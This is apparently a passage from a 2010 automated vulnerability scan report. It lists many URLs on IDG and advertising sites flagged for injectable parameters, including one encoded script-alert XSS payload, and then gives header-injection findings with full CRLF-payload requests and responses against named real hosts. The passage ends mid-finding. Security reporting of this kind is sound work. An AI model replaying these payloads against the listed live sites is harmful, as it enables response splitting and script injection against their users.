2.198. http://idg.com/www/homenew.nsf/home [REST URL parameter 1]

2.199. http://idg.com/www/homenew.nsf/home [REST URL parameter 3]

2.200. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

2.201. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

2.202. http://idg.com/www/homenew.nsf/home [readform parameter]

2.203. http://idg.com/www/homenew.nsf/menu.js [OpenJavascriptLibrary parameter]

2.204. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 1]

2.205. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 3]

2.206. http://idg.com/www/homenew.nsf/menu.js [name of an arbitrarily supplied request parameter]

2.207. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 1]

2.208. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 3]

2.209. http://idg.com/www/homenew.nsf/navmain.css [name of an arbitrarily supplied request parameter]

2.210. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 1]

2.211. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 3]

2.212. http://idg.com/www/homenew.nsf/newsitems.css [name of an arbitrarily supplied request parameter]

2.213. http://idg.com/www/homenew.nsf/public_smo_scripts.js [OpenJavascriptLibrary parameter]

2.214. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 1]

2.215. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 3]

2.216. http://idg.com/www/homenew.nsf/public_smo_scripts.js [name of an arbitrarily supplied request parameter]

2.217. http://idg.com/www/homenew.nsf/request.js [OpenJavascriptLibrary parameter]

2.218. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 1]

2.219. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 3]

2.220. http://idg.com/www/homenew.nsf/request.js [name of an arbitrarily supplied request parameter]

2.221. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 1]

2.222. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 3]

2.223. http://idg.com/www/homenew.nsf/screen2.css [name of an arbitrarily supplied request parameter]

2.224. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 1]

2.225. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 3]

2.226. http://idg.com/www/homenew.nsf/style.css [name of an arbitrarily supplied request parameter]

2.227. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 1]

2.228. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 3]

2.229. http://idg.com/www/homenew.nsf/swfobject.js [name of an arbitrarily supplied request parameter]

2.230. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 1]

2.231. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 3]

2.232. http://idg.com/www/homenew.nsf/tabs.css [name of an arbitrarily supplied request parameter]

2.233. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 1]

2.234. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 3]

2.235. http://idg.com/www/idgproducts.nsf/2010mklanding.html [name of an arbitrarily supplied request parameter]

2.236. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 1]

2.237. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 3]

2.238. http://idg.com/www/idgproducts.nsf/countries [name of an arbitrarily supplied request parameter]

2.239. http://idg.com/www/idgproducts.nsf/countries [openview parameter]

2.240. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 1]

2.241. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 3]

2.242. http://idg.com/www/idgproducts.nsf/productfinder [name of an arbitrarily supplied request parameter]

2.243. http://idg.com/www/idgproducts.nsf/productfinder [readform parameter]

2.244. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 1]

2.245. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 3]

2.246. http://idg.com/www/idgproducts.nsf/typeform [name of an arbitrarily supplied request parameter]

2.247. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 1]

2.248. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 3]

2.249. http://idg.com/www/media.nsf/MRBydate [name of an arbitrarily supplied request parameter]

2.250. http://idg.com/www/media.nsf/MRBydate [readform parameter]

2.251. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 1]

2.252. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 3]

2.253. http://idg.com/www/pr.nsf/PressHome [ReadForm parameter]

2.254. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]

2.255. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]

2.256. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 1]

2.257. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 3]

2.258. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]

2.259. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]

2.260. http://idg.com/www/pr.nsf/prBydate [readform parameter]

2.261. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]

2.262. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.263. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]

2.264. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]

2.265. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]

2.266. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]

2.267. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]

2.268. http://media.pcadvisor.co.uk/graphics/icons/digg.ico [REST URL parameter 3]

2.269. http://media.pcadvisor.co.uk/graphics/icons/slashdot.ico [REST URL parameter 2]

2.270. http://media.pcadvisor.co.uk/scripts/pca.js [REST URL parameter 2]

2.271. http://media.pcadvisor.co.uk/styles/facebox.css [REST URL parameter 2]

2.272. http://media.pcadvisor.co.uk/styles/pcamac.css [REST URL parameter 2]

2.273. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]

2.274. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]

2.275. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]

2.276. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]

2.277. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]

2.278. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]

2.279. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]

2.280. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]

2.281. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]

2.282. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]

2.283. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]

2.284. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]

2.285. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 2]

2.286. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 2]

2.287. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 3]

2.288. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 3]

2.289. http://track.adform.net/adfscript/ [name of an arbitrarily supplied request parameter]

2.290. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/us/en [REST URL parameter 5]

2.291. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/us/en [REST URL parameter 6]

2.292. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/zz/en [REST URL parameter 5]

2.293. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/zz/en [REST URL parameter 6]

2.294. http://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]

2.295. https://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]

2.296. http://www.adotas.com/ [name of an arbitrarily supplied request parameter]

2.297. http://www.adotas.com/2010/12/doubleverify-to-deliver-forward-is-with-verification/ [REST URL parameter 3]

2.298. http://www.adotas.com/about/ [REST URL parameter 1]

2.299. http://www.adotas.com/wp/wp-content/plugins/flash-album-gallery/admin/js/swfaddress.js [REST URL parameter 6]

2.300. http://www.adotas.com/wp/wp-content/plugins/flash-album-gallery/admin/js/swfobject.js [REST URL parameter 6]

2.301. http://www.adotas.com/wp/wp-content/plugins/polls/polls-css.css [REST URL parameter 4]

2.302. http://www.adotas.com/wp/wp-content/plugins/polls/polls-js.php [REST URL parameter 4]

2.303. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 1]

2.304. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 2]

2.305. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 3]

2.306. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [name of an arbitrarily supplied request parameter]

2.307. http://www.adotas.com/wp/wp-includes/js/tw-sack.js [REST URL parameter 3]

2.308. http://www.adotas.com/wp/xmlrpc.php [REST URL parameter 1]

2.309. http://www.btobonline.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]

2.310. http://www.computerworld.dk/art/112943 [REST URL parameter 2]

2.311. http://www.computerworld.dk/art/112943 [name of an arbitrarily supplied request parameter]

2.312. http://www.idc.com/ [name of an arbitrarily supplied request parameter]

2.313. http://www.idg.com/ [name of an arbitrarily supplied request parameter]

2.314. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]

2.315. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]

2.316. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]

2.317. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]

2.318. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]

2.319. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]

2.320. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]

2.321. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]

2.322. http://www.idg.com/www/idgdir.nsf/ContactSearch [REST URL parameter 1]

2.323. http://www.idg.com/www/idgdir.nsf/ContactSearch [REST URL parameter 3]

2.324. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]

2.325. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]

2.326. http://www.idg.com/www/idgdir.nsf/ContactSearch [readForm parameter]

2.327. http://www.idg.com/www/pr.nsf/pr_rss [REST URL parameter 1]

2.328. http://www.idg.com/www/pr.nsf/pr_rss [REST URL parameter 3]

2.329. http://www.idg.com/www/pr.nsf/pr_rss [name of an arbitrarily supplied request parameter]

2.330. http://www.idgknowledgehub.com/blogs/ [cat parameter]

2.331. http://www.idgknowledgehub.com/blogs/ [tag parameter]

2.332. http://www.idgknowledgehub.com/library/ [video parameter]

2.333. http://www.idgmarketfusion.com/ [name of an arbitrarily supplied request parameter]

2.334. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [REST URL parameter 3]

2.335. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [REST URL parameter 4]

2.336. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [name of an arbitrarily supplied request parameter]

2.337. http://www.infoprint.com/precisionmarketing [name of an arbitrarily supplied request parameter]

2.338. http://www.infoworld.com/ [name of an arbitrarily supplied request parameter]

2.339. http://www.infoworld.com/ [source parameter]

2.340. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 1]

2.341. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 2]

2.342. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 2]

2.343. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 3]

2.344. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [name of an arbitrarily supplied request parameter]

2.345. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [source parameter]

2.346. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

2.347. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

2.348. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

2.349. http://www.linuxworld.com/ [name of an arbitrarily supplied request parameter]

2.350. http://www.lunametrics.com/blog/ [REST URL parameter 1]

2.351. http://www.lunametrics.com/blog/ [REST URL parameter 1]

2.352. http://www.lunametrics.com/blog/ [name of an arbitrarily supplied request parameter]

2.353. http://www.mailchimp.com/blog/ [name of an arbitrarily supplied request parameter]

2.354. http://www.marketingvox.com/ [name of an arbitrarily supplied request parameter]

2.355. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 1]

2.356. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 2]

2.357. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 2]

2.358. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]

2.359. http://www.pcadvisor.co.uk/news/index.cfm [name of an arbitrarily supplied request parameter]

2.360. http://www.pcadvisor.co.uk/news/index.cfm [rss parameter]

2.361. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [REST URL parameter 4]

2.362. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [name of an arbitrarily supplied request parameter]

2.363. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 2]

2.364. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 3]

2.365. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 4]

2.366. http://www.plasticsnews.com/china/english/ [name of an arbitrarily supplied request parameter]

2.367. http://www.publish2.com/contact [name of an arbitrarily supplied request parameter]

2.368. http://www.publish2.com/login [name of an arbitrarily supplied request parameter]

2.369. http://www.publish2.com/search/links [callback parameter]

2.370. http://www.publish2.com/search/links [name of an arbitrarily supplied request parameter]

2.371. http://www.publish2.com/search/links [number_of_items parameter]

2.372. http://www.publish2.com/search/links [tag parameter]

2.373. http://www.publish2.com/search/links.js [callback parameter]

2.374. http://www.publish2.com/search/links.js [name of an arbitrarily supplied request parameter]

2.375. http://www.publish2.com/search/links.js [newsgroup parameter]

2.376. http://www.publish2.com/search/links.js [number_of_items parameter]

2.377. http://www.publish2.com/search/links.js [tag parameter]

2.378. http://www.publish2.com/search/links.rss [callback parameter]

2.379. http://www.publish2.com/search/links.rss [name of an arbitrarily supplied request parameter]

2.380. http://www.publish2.com/search/links.rss [newsgroup parameter]

2.381. http://www.publish2.com/search/links.rss [number_of_items parameter]

2.382. http://www.publish2.com/search/links.rss [tag parameter]

2.383. http://www.publish2.com/search/links.xml [callback parameter]

2.384. http://www.publish2.com/search/links.xml [name of an arbitrarily supplied request parameter]

2.385. http://www.publish2.com/search/links.xml [newsgroup parameter]

2.386. http://www.publish2.com/search/links.xml [number_of_items parameter]

2.387. http://www.publish2.com/search/links.xml [tag parameter]

2.388. http://www.publish2.com/syndicate/widget/ [comment_font_family parameter]

2.389. http://www.publish2.com/syndicate/widget/ [comment_font_size parameter]

2.390. http://www.publish2.com/syndicate/widget/ [feed parameter]

2.391. http://www.publish2.com/syndicate/widget/ [feed_type parameter]

2.392. http://www.publish2.com/syndicate/widget/ [headline_font_color parameter]

2.393. http://www.publish2.com/syndicate/widget/ [headline_font_decoration parameter]

2.394. http://www.publish2.com/syndicate/widget/ [headline_font_family parameter]

2.395. http://www.publish2.com/syndicate/widget/ [headline_font_size parameter]

2.396. http://www.publish2.com/syndicate/widget/ [headline_font_weight parameter]

2.397. http://www.publish2.com/syndicate/widget/ [name of an arbitrarily supplied request parameter]

2.398. http://www.publish2.com/syndicate/widget/ [number_of_items parameter]

2.399. http://www.publish2.com/syndicate/widget/ [title parameter]

2.400. http://www.publish2.com/syndicate/widget/ [widget_src parameter]

2.401. http://www.publish2.com/widget/display/publish2_widget_html_61657798d9d56955d570ac504ad152e9/ [feed parameter]

2.402. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]

2.403. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]

2.404. http://www.sixapart.com/favicon.ico [REST URL parameter 1]

2.405. http://www.sixapart.com/ns/at [REST URL parameter 1]

2.406. http://www.sixapart.com/ns/at [REST URL parameter 2]

2.407. http://www.sixapart.com/ns/at [name of an arbitrarily supplied request parameter]

2.408. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 1]

2.409. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 2]

2.410. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 3]

2.411. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [name of an arbitrarily supplied request parameter]

2.412. http://www.staffingindustry.com/ME2/dirmod.asp [mod parameter]

2.413. http://www.strongmail.com/resources/blogs/email_marketing_insights' [REST URL parameter 3]

2.414. http://www.strongmail.com/resources/blogs/email_marketing_insights/ [REST URL parameter 3]

2.415. http://www.strongmail.com/resources/blogs/js/app.js [REST URL parameter 3]

2.416. http://www.strongmail.com/resources/blogs/js/app.js [REST URL parameter 4]

2.417. http://www.strongmail.com/resources/blogs/js/cufon.js [REST URL parameter 3]

2.418. http://www.strongmail.com/resources/blogs/js/cufon.js [REST URL parameter 4]

2.419. http://www.strongmail.com/resources/blogs/js/jquery-1.2.6.min.js [REST URL parameter 3]

2.420. http://www.strongmail.com/resources/blogs/js/jquery-1.2.6.min.js [REST URL parameter 4]

2.421. http://www.stumbleupon.com/submit [url parameter]

2.422. http://www.typepad.com/services/toolbar [autofollowed parameter]

2.423. http://www14.software.ibm.com/webapp/download/byproduct.jsp [REST URL parameter 3]

2.424. http://www.adotas.com/ [User-Agent HTTP header]

2.425. http://www.adotas.com/2010/12/doubleverify-to-deliver-forward-is-with-verification/ [User-Agent HTTP header]

2.426. http://www.adotas.com/about/ [User-Agent HTTP header]

2.427. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [Referer HTTP header]

2.428. http://www.infoprint.com/precisionmarketing [Referer HTTP header]

2.429. http://www.itworldcanada.com/news/career-advice-running-projects-across-time-zones/142135 [Referer HTTP header]

2.430. http://www.itworldcanada.com/news/career-advice-running-projects-across-time-zones/142135 [Referer HTTP header]

2.431. http://www.linuxworld.com/ [Referer HTTP header]

2.432. http://www.networkworld.com/ [Referer HTTP header]

2.433. http://www.quantcast.com/p-25K88fxDSEn9Y [Referer HTTP header]

2.434. http://www.quantcast.com/p-34PxbSficBeTc [Referer HTTP header]

2.435. http://www.quantcast.com/p-fcYWUmj5YbYKM [Referer HTTP header]

2.436. http://seg.sharethis.com/getSegment.php [__stid cookie]

2.437. http://www.idgtechpanel.com/ [name of an arbitrarily supplied request parameter]



1. HTTP header injection  next
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 56b52%0d%0ad5a67d15b17 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; A2=ekNy9Ytg0aPa0000820wsiff3a9Ytg03sY0000820wsifHY+9YcR07Hs0000820wshfgbE9YhW02WG0000820wshfUzq9Yf80bfZ0000o61wshf.ae9YeI06IX0000g410shg8.K9YtA06OJ0000820wsif.bD9YeI06IX0000820wsh; eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=056b52%0d%0ad5a67d15b17; F1=00UilH0003sY9QVZ; B2=71cT0820wsi7W4s0820wsi7I0D0820wsh7Qiy0820wsh6UT.0820wsi7Qiz0g410sh7CEh0o61wsh72xf0820wsh; u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; E2=07Hso61wsh0aPag210si084oE210sf09KD820wrZ08Y5g410s3066Ng20wsg0bcF820wse0aVX820wsd02Edw620sd07A8820wse0bFAm5xosh08wQu7xUse077Tg20wr+07RTg410sf03sYSJHqsi0abMm5xos507fto20ws502WGSIbqsh04gITybush09EZ820ws305meg410sf06IXPEbesh0apK820wrU0bfZo61wsh0bKdo41wsf04m4820wsg06+TnBVush07k1820wse05sM820wsc0bnAME2ysf06OJ820wsi09bwg210s9; C3=0uju820wsh0000200_0ugY820wsi0000004_0tUC820wsi0000080_0wt6820wsi000000w_0v51820wsh0000002_0vBTo61wsh000000g_0tyOo61wsh0001000_; u3=1; ActivityInfo=000nx2bhf%5f000nx5bhf%5f0008uqbhL%5f000g3dbdR%5f000jUQbis%5f000nx1bhf%5f; D3=0ugY00Mm820wsi0wt603tW820wsi0tUC00Mm820wsi0v51004H820wsh0tyO04UKo61wsh0vBT04UKo61wsh0uju00iZ820wsh;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=056b52
d5a67d15b17
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


1.2. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload ff369%0d%0a82c1db4eb16 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; A2=ekNy9Ytg0aPa0000820wsiff3a9Ytg03sY0000820wsifHY+9YcR07Hs0000820wshfgbE9YhW02WG0000820wshfUzq9Yf80bfZ0000o61wshf.ae9YeI06IX0000g410shg8.K9YtA06OJ0000820wsif.bD9YeI06IX0000820wsh; eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=0ff369%0d%0a82c1db4eb16; F1=00UilH0003sY9QVZ; B2=71cT0820wsi7W4s0820wsi7I0D0820wsh7Qiy0820wsh6UT.0820wsi7Qiz0g410sh7CEh0o61wsh72xf0820wsh; u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; E2=07Hso61wsh0aPag210si084oE210sf09KD820wrZ08Y5g410s3066Ng20wsg0bcF820wse0aVX820wsd02Edw620sd07A8820wse0bFAm5xosh08wQu7xUse077Tg20wr+07RTg410sf03sYSJHqsi0abMm5xos507fto20ws502WGSIbqsh04gITybush09EZ820ws305meg410sf06IXPEbesh0apK820wrU0bfZo61wsh0bKdo41wsf04m4820wsg06+TnBVush07k1820wse05sM820wsc0bnAME2ysf06OJ820wsi09bwg210s9; C3=0uju820wsh0000200_0ugY820wsi0000004_0tUC820wsi0000080_0wt6820wsi000000w_0v51820wsh0000002_0vBTo61wsh000000g_0tyOo61wsh0001000_; u3=1; ActivityInfo=000nx2bhf%5f000nx5bhf%5f0008uqbhL%5f000g3dbdR%5f000jUQbis%5f000nx1bhf%5f; D3=0ugY00Mm820wsi0wt603tW820wsi0tUC00Mm820wsi0v51004H820wsh0tyO04UKo61wsh0vBT04UKo61wsh0uju00iZ820wsh;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=995a2f09-c0fe-419b-bf0a-c5da3072ecff3FK05g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=246&BWDate=40527.720093&debuglevel=&FLV=10.1103&RES=128&WMPV=0ff369
82c1db4eb16
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Dec 2010 15:00:10 GMT
Connection: close


1.3. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b1cfe%0d%0a385bd7a08a7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jaw/b1cfe%0d%0a385bd7a08a7/10/51087634/ HTTP/1.1
Host: www.accelacomm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 14:07:06 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=b1cfe
385bd7a08a7
&Source_BC=10&Script=/LP/51087634/reg&
Vary: Accept-Encoding
Content-Length: 429
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.4. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b8f4d%0d%0a75caad6ec0d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

